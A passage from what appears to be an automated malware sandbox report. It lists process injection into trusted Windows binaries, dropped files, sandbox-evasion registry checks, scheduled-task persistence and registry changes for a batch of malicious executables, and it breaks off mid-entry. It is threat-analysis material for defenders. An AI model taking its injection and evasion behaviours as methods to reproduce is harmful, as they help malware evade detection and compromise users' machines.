ycayuhnew.exeycayuhnew.execmstp.exezgoqp.exeenqnjvfa.exeenqnjvfa.exevbc(2).exenewversion2.exeMiruik.exeAddInProcess32.exeRustExternal%u202Enls..scrInstallUtil.exeJDSG4.exePOSA12.exeJDSG3.exeJDSDS4.exe8.exexrfqtvbjh.exeQHGJASD27.exeBVNMXCGHJ7.exeJDSG3.exeJDSDS4.exe7.exeLKXMNBZX55.exe60E0G7UKRntM1TQ.exeBVNMXCGHJ7.exeJDSDS4.exeJDSG3.exeJDSG4.exeJDSG3.exePOSA12.exeJDSG3.exeJDSDS4.exeBVNMXCGHJ7.exeJDSDS4.exeQHGJASD27.exeBVNMXCGHJ7.exeLKXMNBZX55.exeBVNMXCGHJ7.exeJDSG3.exeJDSDS4.exeJDSG3.exeBVNMXCGHJ7.exeJDSDS4.exeJDSG3.exeJDSDS4.exeBVNMXCGHJ7.exeJDSG3.exe60E0G7UKRntM1TQ.exedescription pid process target process PID 3964 set thread context of 3960 3964 ycayuhnew.exe ycayuhnew.exe PID 3960 set thread context of 3064 3960 ycayuhnew.exe Explorer.EXE PID 4844 set thread context of 3064 4844 cmstp.exe Explorer.EXE PID 4844 set thread context of 4860 4844 cmstp.exe firefox.exe PID 3872 set thread context of 2560 3872 zgoqp.exe zgoqp.exe PID 4844 set thread context of 1280 4844 cmstp.exe firefox.exe PID 4844 set thread context of 3648 4844 cmstp.exe firefox.exe PID 4844 set thread context of 4504 4844 cmstp.exe firefox.exe PID 1748 set thread context of 524 1748 enqnjvfa.exe enqnjvfa.exe PID 524 set thread context of 3064 524 enqnjvfa.exe Explorer.EXE PID 2172 set thread context of 3896 2172 vbc(2).exe vbc(2).exe PID 4824 set thread context of 1432 4824 newversion2.exe InstallUtil.exe PID 4836 set thread context of 4700 4836 Miruik.exe AddInProcess32.exe PID 4700 set thread context of 1532 4700 AddInProcess32.exe AddInProcess32.exe PID 4700 set thread context of 3476 4700 AddInProcess32.exe AddInProcess32.exe PID 4700 set thread context of 380 4700 AddInProcess32.exe AddInProcess32.exe PID 3376 set thread context of 4944 3376 RustExternal%u202Enls..scr RegAsm.exe PID 4844 set thread context of 5140 4844 cmstp.exe NOTEPAD.EXE PID 1432 set thread context of 5472 1432 InstallUtil.exe AddInProcess.exe PID 4660 set thread context of 4552 4660 JDSG4.exe RegAsm.exe PID 1432 set thread context of 5860 1432 InstallUtil.exe AddInProcess.exe PID 4640 set thread context of 5444 4640 POSA12.exe RegAsm.exe PID 5852 set thread context of 5044 5852 JDSG3.exe RegAsm.exe PID 4488 set thread context of 4624 4488 JDSDS4.exe RegAsm.exe PID 5836 set thread context of 5136 5836 8.exe InstallUtil.exe PID 2988 set thread context of 3188 2988 xrfqtvbjh.exe xrfqtvbjh.exe PID 5284 set thread context of 5680 5284 QHGJASD27.exe RegAsm.exe PID 5556 set thread context of 5340 5556 BVNMXCGHJ7.exe RegAsm.exe PID 368 set thread context of 804 368 JDSG3.exe RegAsm.exe PID 2288 set thread context of 2988 2288 JDSDS4.exe RegAsm.exe PID 3520 set thread context of 4144 3520 7.exe svchost.exe PID 2664 set thread context of 5500 2664 LKXMNBZX55.exe RegAsm.exe PID 3520 set thread context of 6120 3520 7.exe svchost.exe PID 5892 set thread context of 3636 5892 60E0G7UKRntM1TQ.exe 60E0G7UKRntM1TQ.exe PID 2992 set thread context of 5212 2992 BVNMXCGHJ7.exe RegAsm.exe PID 5784 set thread context of 1132 5784 JDSDS4.exe RegAsm.exe PID 3448 set thread context of 1108 3448 JDSG3.exe RegAsm.exe PID 7124 set thread context of 6244 7124 JDSG4.exe RegAsm.exe PID 6384 set thread context of 6752 6384 JDSG3.exe RegAsm.exe PID 6892 set thread context of 6984 6892 POSA12.exe RegAsm.exe PID 7108 set thread context of 6236 7108 JDSG3.exe RegAsm.exe PID 6396 set thread context of 6312 6396 JDSDS4.exe RegAsm.exe PID 6836 set thread context of 6592 6836 BVNMXCGHJ7.exe RegAsm.exe PID 4844 set thread context of 1192 4844 cmstp.exe firefox.exe PID 6896 set thread context of 5232 6896 JDSDS4.exe RegAsm.exe PID 5900 set thread context of 7072 5900 QHGJASD27.exe RegAsm.exe PID 6764 set thread context of 4020 6764 BVNMXCGHJ7.exe RegAsm.exe PID 1432 set thread context of 4864 1432 InstallUtil.exe AddInProcess.exe PID 6920 set thread context of 4520 6920 LKXMNBZX55.exe RegAsm.exe PID 5956 set thread context of 1332 5956 BVNMXCGHJ7.exe RegAsm.exe PID 5500 set thread context of 4960 5500 JDSG3.exe RegAsm.exe PID 5472 set thread context of 2576 5472 JDSDS4.exe RegAsm.exe PID 6024 set thread context of 5184 6024 JDSG3.exe RegAsm.exe PID 6800 set thread context of 5324 6800 BVNMXCGHJ7.exe RegAsm.exe PID 1696 set thread context of 6896 1696 JDSDS4.exe RegAsm.exe PID 1432 set thread context of 4268 1432 InstallUtil.exe AddInProcess.exe PID 2352 set thread context of 4468 2352 JDSG3.exe RegAsm.exe PID 4312 set thread context of 868 4312 JDSDS4.exe RegAsm.exe PID 792 set thread context of 5564 792 BVNMXCGHJ7.exe RegAsm.exe PID 2888 set thread context of 2460 2888 JDSG3.exe RegAsm.exe PID 3636 set thread context of 6472 3636 60E0G7UKRntM1TQ.exe 60E0G7UKRntM1TQ.exe PID 3636 set thread context of 2208 3636 60E0G7UKRntM1TQ.exe 60E0G7UKRntM1TQ.exe PID 3636 set thread context of 4060 3636 60E0G7UKRntM1TQ.exe 60E0G7UKRntM1TQ.exe PID 3636 set thread context of 3932 3636 60E0G7UKRntM1TQ.exe 60E0G7UKRntM1TQ.exe -
Drops file in Program Files directory 64 IoCs
Processes:
60E0G7UKRntM1TQ.exeMiljoeministeren.execmstp.exeExplorer.EXEdescription ioc process File opened for modification C:\Program Files\7-Zip\Lang\sv.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\7z.sfx 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\History.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\fur.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\ne.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files (x86)\Common Files\Haandline\Erts\Angulately.Mar Miljoeministeren.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\ka.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\License.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\ps.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\readme.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\fi.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\tr.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files (x86)\Ssnrt\7no04fld0or5.exe cmstp.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\gu.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\ug.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\ar.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\fa.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\yo.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt 60E0G7UKRntM1TQ.exe File created C:\Program Files (x86)\Ssnrt\7no04fld0or5.exe Explorer.EXE File opened for modification C:\Program Files\7-Zip\Lang\is.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\sa.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\uk.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\7-zip.dll 60E0G7UKRntM1TQ.exe File created C:\Program Files\7-Zip\7-zip.dll.tmp 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\en.ttt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\tg.txt 60E0G7UKRntM1TQ.exe File created C:\Program Files\7-Zip\Lang\tk.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\ro.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\sl.txt 60E0G7UKRntM1TQ.exe File created C:\Program Files\7-Zip\Lang\sw.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\sw.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\eo.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\es.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\pt.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\7zFM.exe 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\et.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\kab.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\mk.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt 60E0G7UKRntM1TQ.exe File opened for modification C:\Program Files (x86)\Gkdv\yx8pgdl0px.exe Explorer.EXE File opened for modification C:\Program Files\7-Zip\Lang\az.txt 60E0G7UKRntM1TQ.exe -
Drops file in Windows directory 1 IoCs
Processes:
Miljoeministeren.exedescription ioc process File opened for modification C:\Windows\Axiation\Stningernes\Hypotekforeningerne.ini Miljoeministeren.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 15 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6120 5008 WerFault.exe MNZXHA36.exe 3852 6072 WerFault.exe LKSJDSAKDQ.exe 6064 1784 WerFault.exe MNZXHA36.exe 6356 6540 WerFault.exe LKSJDSAKDQ.exe 4488 6540 WerFault.exe LKSJDSAKDQ.exe 6580 4332 WerFault.exe 7no04fld0or5.exe 6420 1372 WerFault.exe yx8pgdl0px.exe 5816 540 WerFault.exe tord.exe 5368 5948 WerFault.exe CRYPTED_BSI20221205.exe 4372 5336 WerFault.exe gntuud.exe 3392 4392 WerFault.exe gntuud.exe 6536 316 WerFault.exe gntuud.exe 2156 6224 WerFault.exe gntuud.exe 5224 2352 WerFault.exe 2611.exe 6408 2888 WerFault.exe gntuud.exe -
NSIS installer 12 IoCs
Processes:
resource yara_rule C:\Users\Admin\Downloads\alaat2.1.exe nsis_installer_1 C:\Users\Admin\Downloads\alaat2.1.exe nsis_installer_2 C:\Users\Admin\Downloads\alaat2.1.exe nsis_installer_1 C:\Users\Admin\Downloads\alaat2.1.exe nsis_installer_2 C:\Users\Admin\Downloads\makanaki.exe nsis_installer_1 C:\Users\Admin\Downloads\makanaki.exe nsis_installer_2 C:\Users\Admin\Downloads\makanaki.exe nsis_installer_1 C:\Users\Admin\Downloads\makanaki.exe nsis_installer_2 C:\Users\Admin\Downloads\jeymo2.1.exe nsis_installer_1 C:\Users\Admin\Downloads\jeymo2.1.exe nsis_installer_2 C:\Users\Admin\Downloads\jeymo2.1.exe nsis_installer_1 C:\Users\Admin\Downloads\jeymo2.1.exe nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
ChromeSetup.exetaskmgr.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ChromeSetup.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ChromeSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ChromeSetup.exe -
Checks processor information in registry 2 TTPs 44 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
rundll32.exeInstallUtil.exefile.exefirefox.exefirefox.exefirefox.exebuild.exetaskmgr.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 InstallUtil.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet rundll32.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString InstallUtil.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz rundll32.exe -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2056 schtasks.exe 5856 schtasks.exe 5948 schtasks.exe 4640 schtasks.exe 5356 schtasks.exe 6752 schtasks.exe 1220 schtasks.exe 3568 schtasks.exe 5728 schtasks.exe 3312 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 4880 timeout.exe 5568 timeout.exe 5664 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chromnius.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chromnius.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chromnius.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chromnius.exe -
Processes:
Explorer.EXEcmmon32.execmstp.exewlanext.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Key created \Registry\User\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 cmmon32.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\IESettingSync Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \Registry\User\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 cmstp.exe Key created \Registry\User\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 wlanext.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE -
Modifies data under HKEY_USERS 2 IoCs
Processes:
chromnius.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chromnius.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133147574023205411" chromnius.exe -
Modifies registry class 64 IoCs
Processes:
Explorer.EXEsetup.exelinda5.exe60E0G7UKRntM1TQ.execrashreporter.exeOpenWith.exefirefox.exeOpenWith.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.xht setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Chromnius\\Application\\chromnius.exe\" --single-argument %1" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.pdf\OpenWithProgids\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.xht\OpenWithProgids\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings linda5.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Chromnius\\Application\\109.0.5386.0\\notification_helper.exe\"" setup.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 60E0G7UKRntM1TQ.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.htm\OpenWithProgids\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 60E0G7UKRntM1TQ.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Applications\crashreporter.exe crashreporter.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 60E0G7UKRntM1TQ.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip 60E0G7UKRntM1TQ.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE\Application\ApplicationName = "Chromnius" setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Applications\crashreporter.exe\NoOpenWith = "0" crashreporter.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Chromnius\\Application\\chromnius.exe,0" setup.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5000310000000000855517bb100041646d696e003c0009000400efbe0c551999855517bb2e00000077e10100000001000000000000000000000000000000093ff400410064006d0069006e00000014000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE\DefaultIcon setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip 60E0G7UKRntM1TQ.exe Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ChromniusHTM.WXVEMRSTIGYW5ZPQXNSLO4DCFE setup.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.htm setup.exe Set 